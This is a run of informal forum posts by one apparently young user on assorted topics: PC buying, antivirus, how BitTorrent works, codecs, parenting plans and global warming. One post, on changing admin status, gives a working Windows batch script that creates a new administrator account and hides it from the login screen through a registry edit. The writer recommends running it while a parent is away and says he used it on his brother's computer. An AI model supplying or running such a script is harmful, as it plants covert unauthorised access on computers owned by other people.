Don't buy a Dell! (And I need help)
i have. the hp i have at the moment has been going about 4 years without a single problem. i can say though that it wasn't worth anything like what i payed. back when i bought it i didn't know much about computer specs, but i know now i got ripped of. this is the same for all prebuilt systems though, its always cheaper to buy the parts and spend a few hours putting it together.

My Anti Virus and me - We are epic
1. yes, nod32 if you want to pay, avira antivir if you don't. 2. bit torrent (shortened to torrent, sort of) is a protocol for sharing files between people. it is commonly used to share pirated stuff though, so im not sure if its appropriate here. basically the file that wants to be shared is split into hundreds of sections. 1 person starts with the file, and people connect to there computer and download different sections. the people who downloaded sections can then download other sections they don't have of others who have them sections, untill they ahve all the sections (complete the download). people connect to 'trackers' to learn who has sections they don't, and there ip address (so they can connect to them and download sections). 'trackers' are just servers that track who is downloading the file and tell other people to connect to them to download. bit torrent is similar to the technology behind other peer to peer programs such as limewire. for more details see: http://en.wikipedia.org/wiki/BitTorrent_(protocol) heres a few ways to explain it: -person A has parts 1 to 5 of the file. -person B connects to A and downloads parts 1 and 2 -person C connects to A and downloads parts 3 to 5 -persons B and C give each other their sections (so they both have 1-5) -Persons B and C now have 100% of the file. person A only gave out file once, but 2 people got it. instead of everyone (thousands of people in some cases) connecting to 1 single computer and download it all from there (which would take ages to give it to everyone and probably crash the server), everyone only downloads parts from everyone else. Imagine your teacher told you to tell all 1000 students in your school to go to the gym at midday the next day to receive there reports. you could tell all 1000 students individually but it would take you forever. instead, you could tell 1 person and tell them to tell all their friends, and get their friends to tell all their friends. you could tell this to 1 person from each group (tell 1 jock, tell 1 nerd etc). if they do tell their friends everyone would eventually know to go to the gym at midday the next day. except maybe a few loners who have no friends, but you get what i mean. 3. google 'torrent'

GE prices and Excel
maybe you could host a php file somewhere (there are plenty of free hosts) that strips the page down to just the item price, and then point excel to that php file.

Changing Computer Admin status.
lol if your parents had had any knowledge they would have password protected the admin account. this 'trick' may work for someone who has parents not smart enough to password protect the admin account, but for most it wont. Your not the first to discover this anyway, almost everyone knows it. a better way of getting an admin account is getting a minute access to the computer while an admins away (parent gone to toilet etc) and run a batch file like this: set AC_NAME= set AC_PASS= net user %AC_NAME% %AC_PASS% /add net localgroup Administrators %AC_NAME% /add echo Windows Registry Editor Version 5.00>%TEMP%\addregistry.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%TEMP%\addregistry.reg echo "%AC_NAME%"=dword:00000000>>%TEMP%\addregistry.reg Regedit /s %TEMP%\addregistry.reg Del %TEMP%\addregistry.reg which would simply create a hidden admin account. (if you use the windows welcome screen you have to press Ctrl+Alt+Del twice and enter name pass there). off course this is very easy to find out as well, and next time your parent looks at the User Accounts in control panel you will be most likely grounded. What i did to my computer illiterate brothers computer because he made me a limited user there (scared i was going to touch hes files or something lol) was use the above code while he was logged on, and made the username some technical computer jargon so he thought he couldn't delete it. like you said, im not recommending anyone use the code, it is very easy to work out you have created your own admin account.

How would you raise your children?
i wouldn't discipline with anger. (which i was) i would make sure they not afraid of me at all. ill give them independence and let them learn from mistakes. (i was sometimes, but rarely) ill make sure they never feel like they shouldn't do something reasonable because there afraid i might not approve. ill make sure im not a restriction to them living their lifes. (i remember feeling like this when i was really young) Hopefully they wont end up as shy as me with all that. Ill make sure they know education is very important, and even if they want to muck around and throw things at teachers in unimportant classes, i wont let them do it in maths or English (English for the first 10 or so years atleast). I wont send them to any expensive rich school full of [bleep]s who know it all (or think they do) and think their so much better than anyone. Ill send them to a state school with kids from other hard working middle class family's. Ill make sure they develop a social life (which i didnt very well untill 3rd or 4th grade) as early as possible. Ill do everything they can to make sure they dont ever become a 'follower' (which i admittedly was). i dont expect, or even want a leader, but as long as they can make their own choices on things, and not give in to peer pressure easily. ill let them know computers are a good resource, and teach them about them from an early age. ill also let them know they arnt the whole world. Ill give them there own cheap computer from no less than 14 years old. ill stop monitoring there internet usage when they hit 11 or 12. ill certainly in force my love, my dads love, and my grandfathers love (and possibly hes dads love) of technical things (mechanics, technical drawing, engineering etc). he will be drawing basic technical drawings as soon as he can, and ill have him changing car wheels (except tightening nuts and lifting on and off of studs) by the age of 6. ill help him build billy carts at younger ages, while teaching him a lot about cars. in the mid teen years ill do a car project with him (complete build from ground up), just like my dad is doing with me and my grandfather done with my dad. cars are my biggest passion, probably my dads biggest passion, and ill keep that family tradition going. ill make sure he doesn't waste his holidays on runescape like i did upto 2 years ago. i never knew how great life was untill i quit runescape. most importantly ill be a cool dad. his mates will come to me in later teen life asking for help with their cars and wanting repair jobs done. ill be the cool car dude lol. im sure theres other things i can think of but ive been here for atleast 30 minutes thinking and writing this post, so that will do for now.

Mah Scanner is Broked... Please Halp!
not sure about win 2k but in xp turn the scanner on, goto my computer, right lcick the scanner and select 'Get picture using scanner wizard'. this will use xp's built in wizard to get it, so you dont have to worry about the usually bulky and grossly over featured software that came with it. not sure if its the same in win 2k though

what is the best video quality?
the file extension doesn't confirm what codec is used. the file extension is known as the container, the video within the file is encoded with a codec, and the audio is also encoded with a codec. you have the containers listed, not the codecs. mpeg 2 (which is what you said it is) is about the most common codec around. its what most dvds (if not all) are encoded in. post what EXACTLY nero is saying is wrong, and what version of nero your using. also download this and open the file with that. it will tell you what audio/video codec its using.

Stupidest Thing You Did As A Child?

Global warming - Do you mind it?
i mind it and it would be good if it would go away, but apart from changing to energy efficient light globes and simple things like that fixing it will come at a huge cost to everyone's quality of life in the short term. in the long term its worth it, but in the next few years all we are doing is pooring $$$ down the drain into something which isnt actually effecting us very much yet. that leaves 3 kinds of people on the planet: -the kind that are willing to poor everything and anything into prevention, destroying our economy. in a few years we will all be struggling to find food and be crippled by disease but it will be ok because we know the climate isnt in as much danger anymore. -the kind that are willing to put some money toward it but still want to save enough to try and somehow save the economy from doom. -the kind that want to live the best life THEY can, or for the next few decades atleast. they want to spend there $$$ on fun exciting things to enjoy, so when they die they can look back and say life was great! there kids may have a very different life though.
